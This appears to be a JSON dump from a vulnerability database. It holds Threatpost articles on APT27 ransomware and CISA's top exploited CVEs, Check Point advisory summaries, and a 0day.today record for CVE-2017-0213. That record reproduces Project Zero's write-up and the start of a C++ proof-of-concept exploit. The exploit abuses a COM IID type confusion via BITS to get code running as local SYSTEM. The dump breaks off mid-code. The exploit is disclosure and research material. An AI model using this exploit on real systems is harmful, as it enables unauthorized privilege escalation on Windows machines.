webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET.\n\nWrite a comment\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Malware](<https://threatpost.com/category/malware-2/>)\n", "cvss3": {}, "published": "2021-01-05T15:26:12", "type": "threatpost", "title": "Major Gaming Companies Hit with Ransomware Linked to APT27", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2021-01-05T15:26:12", "id": "THREATPOST:3649750E149C0B00551806E47C047B39", "href": "https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2019-19781", "CVE-2020-0787", "CVE-2020-1472", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T18:39:56", "id": "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "href": "https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T15:46:56", "description": "An elevation of privilege exists in Windows COM Aggregate Marshaler. The vulnerability is due to improper handling of certain objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows COM Elevation of Privilege (CVE-2017-0213)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "CPAI-2017-0379", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-02-22T23:28:34", "description": "A privilege escalation exists in Microsoft Windows Background Intelligent Transfer Service. Successful exploitation of this vulnerability would allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Background Intelligent Transfer Service Privilege Escalation (CVE-2020-0787)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-02-22T00:00:00", "id": "CPAI-2020-3458", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-21T15:35:29", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-05-17T00:00:00", "type": "zdt", "title": "Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-17T00:00:00", "id": "1337DAY-ID-27798", "href": "https://0day.today/exploit/description/27798", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107\r\n \r\nWindows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nWhen accessing an OOP COM object using IRemUnknown2 the local unmarshaled proxy can be for a different interface to that requested by QueryInterface resulting in a type confusion which can result in EoP.\r\n \r\nDescription:\r\n \r\nQuerying for an IID on a OOP (or remote) COM object calls the ORPC method RemQueryInterface or RemQueryInterface2 on the default proxy. This request is passed to the remote object which queries the implementation object and if successful returns a marshaled representation of that interface to the caller. \r\n \r\nThe difference between RemQueryInterface and RemQueryInterface2 (RQI2) is how the objects are passed back to the caller. For RemQueryInterface the interface is passed back as a STDOBJREF which only contains the basic OXID/OID/IPID information to connect back. RemQueryInterface2 on the other hand passes back MInterfacePointer structures which is an entire OBJREF. The rationale, as far as I can tell, is that RQI2 is used for implementing in-process handlers, some interfaces can be marshaled using the standard marshaler and others can be custom marshaled. This is exposed through the Aggregate Standard Marshaler. \r\n \r\nThe bug lies in the implementation of unpacking the results of the the RQI2 request in CStdMarshal::Finish_RemQIAndUnmarshal2. For each MInterfacePointer CStdMarshal::UnmarshalInterface is called passing the IID of the expected interface and the binary data wrapped in an IStream. CStdMarshal::UnmarshalInterface blindly unmarshals the interface, which creates a local proxy object but the proxy is created for the IID in the OBJREF stream and NOT the IID requested in RQI2. No further verification occurs at this point and the created proxy is passed back up the call stack until the received by the caller (through a void** obviously). \r\n \r\nIf the IID in the OBJREF doesn\u2019t match the IID requested the caller doesn\u2019t know, if it calls any methods on the expected interface it will be calling a type confused object. This could result in crashes in the caller when it tries to access methods on the expected interface which aren\u2019t there or are implemented differently. You could probably also return a standard OBJREF to a object local to the caller, this will result in returning the local object itself which might have more scope for exploiting the type confusion. In order to get the caller to use RQI2 we just need to pass it back an object which is custom marshaled with the Aggregate Standard Marshaler. This will set a flag on the marshaler which indicates to always use the aggregate marshaler which results in using RQI2 instead of RQI. As this class is a core component of COM it\u2019s trusted and so isn\u2019t affected by the EOAC_NO_CUSTOM_MARSHAL setting.\r\n \r\nIn order to exploit this a different caller needs to call QueryInterface on an object under a less trusted user's control. This could be a more privileged user (such as a sandbox broker), or a privileged service. This is pretty easy pattern to find, any method in an exposed interface on a more trusted COM object which takes an interface pointer or variant would potentially be vulnerable. For example IPersistStream takes an IStream interface pointer and will call methods on it. Another type of method is one of the various notification interfaces such as IBackgroundCopyCallback for BITS. This can probably also be used remotely if the attacker has the opportunity to inject an OBJREF stream into a connection which is set to CONNECT level security (which seems to be the default activation security). \r\n \r\nOn to exploitation, as you well know I\u2019ve little interest in exploiting memory corruptions, especially as this would either this will trigger CFG on modern systems or would require a very precise lineup of expected method and actual called method which could be tricky to exploit reliably. However I think at least using this to escape a sandbox it might be your only option. So I\u2019m not going to do that, instead I\u2019m going to exploit it logically, the only problem is this is probably unexploitable from a sandbox (maybe) and requires a very specific type of callback into our object. \r\n \r\nThe thing I\u2019m going to exploit is in the handling of OLE Automation auto-proxy creation from type libraries. When you implement an Automation compatible object you could implement an explicit proxy but if you\u2019ve already got a Type library built from your IDL then OLEAUT32 provides an alternative. If you register your interface with a Proxy CLSID for PSOAInterface or PSDispatch then instead of loading your PS DLL it will load OLEAUT32. The proxy loader code will lookup the interface entry for the passed IID to see if there\u2019s a registered type library associated with it. If there is the code will call LoadTypeLib on that library and look up the interface entry in the type library. It will then construct a custom proxy object based on the type library information. \r\n \r\nThe trick here is while in general we don\u2019t control the location of the type library (so it\u2019s probably in a location we can write to such as system32) if we can get an object unmarshaled which indicates it\u2019s IID is one of these auto-proxy interfaces while the privileged service is impersonating us we can redirect the C: drive to anywhere we like and so get the service to load an arbitrary type library file instead of a the system one. One easy place where this exact scenario occurs is in the aforementioned BITS SetNotifyInterface function. The service first impersonates the caller before calling QI on the notify interface. We can then return an OBJREF for a automation IID even though the service asked for a BITS callback interface.\r\n \r\nSo what? Well it\u2019s been known for almost 10 years that the Type library file format is completely unsafe. It was reported and it wasn\u2019t changed, Tombkeeper highlighted this in his \u201cSexrets [sic] of LoadLibrary\u201d presentation at CSW 2015. You can craft a TLB which will directly control EIP. Now you\u2019d assume therefore I\u2019m trading a unreliable way of getting EIP control for one which is much easier, if you assume that you\u2019d be wrong. Instead I\u2019m going to abuse the fact that TLBs can have referenced type libraries, which is used instead of embedding the type definitions inside the TLB itself. When a reference type is loaded the loader will try and look up the TLB by its GUID, if that fails it will take the filename string and pass it verbatim to LoadTypeLib. It\u2019s a lesser know fact that this function, if it fails to find a file with the correct name will try and parse the name as a moniker. Therefore we can insert a scriptlet moniker into the type library, when the auto-proxy generator tries to find how many functions the interface implements it walks the inheritance chain, which causes the referenced TLB to be loaded, which causes a scriptlet moniker to be loaded and bound which results in arbitrary execution in a scripting language inside the privileged COM caller. \r\n \r\nThe need to replace the C: drive is why this won\u2019t work as a sandbox escape. Also it's a more general technique, not specific to this vulnerability as such, you could exploit it in the low-level NDR marshaler layer, however it\u2019s rare to find something impersonating the caller during the low-level unmarshal. Type libraries are not loaded using the flag added after CVE-2015-1644 which prevent DLLs being loaded from the impersonate device map. I think you might want to fix this as well as there\u2019s other places and scenarios this can occur, for example there\u2019s a number of WMI services (such as anything which touches GPOs) which result in the ActiveDS com object being created, this is automation compatible and so will load a type library while impersonating the caller. Perhaps the auto-proxy generated should temporarily disable impersonation when loading the type library to prevent this happening. \r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C++ source code file. You need to compile it first. It abuses the BITS SetNotifyInterface to get a type library loaded under impersonation. We cause it to load a type library which references a scriptlet moniker which gets us code execution inside the BITS service.\r\n \r\n1) Compile the C++ source code file.\r\n2) Execute the PoC from a directory writable by the current user. \r\n3) An admin command running as local system should appear on the current desktop.\r\n \r\nExpected Result:\r\nThe caller should realize there\u2019s an IID mismatch and refuse to unmarshal, or at least QI the local proxy for the correct interface.\r\n \r\nObserved Result:\r\nThe wrong proxy is created to that requested resulting in type confusion and an automation proxy being created resulting in code execution in the BITS server.\r\n*/\r\n \r\n// BITSTest.cpp : Defines the entry point for the console application.\r\n//\r\n#include <bits.h>\r\n#include <bits4_0.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <lm.h>\r\n#include <string>\r\n#include <comdef.h>\r\n#include <winternl.h>\r\n#include <Shlwapi.h>\r\n#include <strsafe.h>\r\n#include <vector>\r\n \r\n#pragma comment(lib, \"shlwapi.lib\")\r\n \r\nstatic bstr_t IIDToBSTR(REFIID riid)\r\n{\r\n LPOLESTR str;\r\n bstr_t ret = \"Unknown\";\r\n if (SUCCEEDED(StringFromIID(riid, &str)))\r\n {\r\n ret = str;\r\n CoTaskMemFree(str);\r\n }\r\n return ret;\r\n}\r\n \r\nGUID CLSID_AggStdMarshal2 = { 0x00000027,0x0000,0x0008,{ 0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 } };\r\nGUID IID_ITMediaControl = { 0xc445dde8,0x5199,0x4bc7,{ 0x98,0x07,0x5f,0xfb,0x92,0xe4,0x2e,0x09 } };\r\n \r\nclass CMarshaller : public IMarshal\r\n{\r\n LONG _ref_count;\r\n IUnknownPtr _unk;\r\n \r\n ~CMarshaller() {}\r\n \r\npublic:\r\n \r\n CMarshaller(IUnknown* unk) : _ref_count(1)\r\n {\r\n _unk = unk;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE QueryInterface(\r\n /* [in] */ REFIID riid,\r\n /* [iid_is][out] */ _COM_Outptr_ void __RPC_FAR *__RPC_FAR *ppvObject)\r\n {\r\n *ppvObject = nullptr;\r\n printf(\"QI - Marshaller: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n \r\n if (riid == IID_IUnknown)\r\n {\r\n *ppvObject = this;\r\n }\r\n else if (riid == IID_IMarshal)\r\n {\r\n *ppvObject = static_cast<IMarshal*>(this);\r\n }\r\n else\r\n {\r\n return E_NOINTERFACE;\r\n }\r\n printf(\"Queried Success: %p\\n\", *ppvObject);\r\n ((IUnknown*)*ppvObject)->AddRef();\r\n return S_OK;\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE AddRef(void)\r\n {\r\n printf(\"AddRef: %d\\n\", _ref_count);\r\n return InterlockedIncrement(&_ref_count);\r\n }\r\n \r\n virtual ULONG STDMETHODCALLTYPE Release(void)\r\n {\r\n printf(\"Release: %d\\n\", _ref_count);\r\n ULONG ret = InterlockedDecrement(&_ref_count);\r\n if (ret == 0)\r\n {\r\n printf(\"Release object %p\\n\", this);\r\n delete this;\r\n }\r\n return ret;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetUnmarshalClass(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ CLSID *pCid)\r\n {\r\n *pCid = CLSID_AggStdMarshal2;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags,\r\n /* [annotation][out] */\r\n _Out_ DWORD *pSize)\r\n {\r\n *pSize = 1024;\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE MarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][unique][in] */\r\n _In_opt_ void *pv,\r\n /* [annotation][in] */\r\n _In_ DWORD dwDestContext,\r\n /* [annotation][unique][in] */\r\n _Reserved_ void *pvDestContext,\r\n /* [annotation][in] */\r\n _In_ DWORD mshlflags)\r\n {\r\n printf(\"Marshal Interface: %ls\\n\", IIDToBSTR(riid).GetBSTR());\r\n IID iid = riid;\r\n if (iid == __uuidof(IBackgroundCopyCallback2) || iid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Setting bad IID\\n\");\r\n iid = IID_ITMediaControl;\r\n }\r\n HRESULT hr = CoMarshalInterface(pStm, iid, _unk, dwDestContext, pvDestContext, mshlflags);\r\n printf(\"Marshal Complete: %08X\\n\", hr);\r\n return hr;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE UnmarshalInterface(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm,\r\n /* [annotation][in] */\r\n _In_ REFIID riid,\r\n /* [annotation][out] */\r\n _Outptr_ void **ppv)\r\n {\r\n return E_NOTIMPL;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE ReleaseMarshalData(\r\n /* [annotation][unique][in] */\r\n _In_ IStream *pStm)\r\n {\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE DisconnectObject(\r\n /* [annotation][in] */\r\n _In_ DWORD dwReserved)\r\n {\r\n return S_OK;\r\n }\r\n};\r\n \r\nclass FakeObject : public IBackgroundCopyCallback2, public IPersist\r\n{\r\n LONG m_lRefCount;\r\n \r\n ~FakeObject() {};\r\n \r\npublic:\r\n //Constructor, Destructor\r\n FakeObject() {\r\n m_lRefCount = 1;\r\n }\r\n \r\n //IUnknown\r\n HRESULT __stdcall QueryInterface(REFIID riid, LPVOID *ppvObj)\r\n {\r\n if (riid == __uuidof(IUnknown))\r\n {\r\n printf(\"Query for IUnknown\\n\");\r\n *ppvObj = this;\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback2))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback2\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback2*>(this);\r\n }\r\n else if (riid == __uuidof(IBackgroundCopyCallback))\r\n {\r\n printf(\"Query for IBackgroundCopyCallback\\n\");\r\n *ppvObj = static_cast<IBackgroundCopyCallback*>(this);\r\n }\r\n else if (riid == __uuidof(IPersist))\r\n {\r\n printf(\"Query for IPersist\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else if (riid == IID_ITMediaControl)\r\n {\r\n printf(\"Query for ITMediaControl\\n\");\r\n *ppvObj = static_cast<IPersist*>(this);\r\n }\r\n else\r\n {\r\n printf(\"Unknown IID: %ls %p\\n\", IIDToBSTR(riid).GetBSTR(), this);\r\n *ppvObj = NULL;\r\n return E_NOINTERFACE;\r\n }\r\n \r\n ((IUnknown*)*ppvObj)->AddRef();\r\n return NOERROR;\r\n }\r\n \r\n ULONG __stdcall AddRef()\r\n {\r\n return InterlockedIncrement(&m_lRefCount);\r\n }\r\n \r\n ULONG __stdcall Release()\r\n {\r\n ULONG ulCount = InterlockedDecrement(&m_lRefCount);\r\n \r\n if (0 == ulCount)\r\n {\r\n delete this;\r\n }\r\n \r\n return ulCount;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob)\r\n {\r\n printf(\"JobTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobError(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyError *pError)\r\n {\r\n printf(\"JobError\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE JobModification(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ DWORD dwReserved)\r\n {\r\n printf(\"JobModification\\n\");\r\n return S_OK;\r\n }\r\n \r\n \r\n virtual HRESULT STDMETHODCALLTYPE FileTransferred(\r\n /* [in] */ __RPC__in_opt IBackgroundCopyJob *pJob,\r\n /* [in] */ __RPC__in_opt IBackgroundCopyFile *pFile)\r\n {\r\n printf(\"FileTransferred\\n\");\r\n return S_OK;\r\n }\r\n \r\n virtual HRESULT STDMETHODCALLTYPE GetClassID(\r\n /* [out] */ __RPC__out CLSID *pClassID)\r\n {\r\n *pClassID = GUID_NULL;\r\n return S_OK;\r\n }\r\n};\r\n \r\n_COM_SMARTPTR_TYPEDEF(IBackgroundCopyJob, 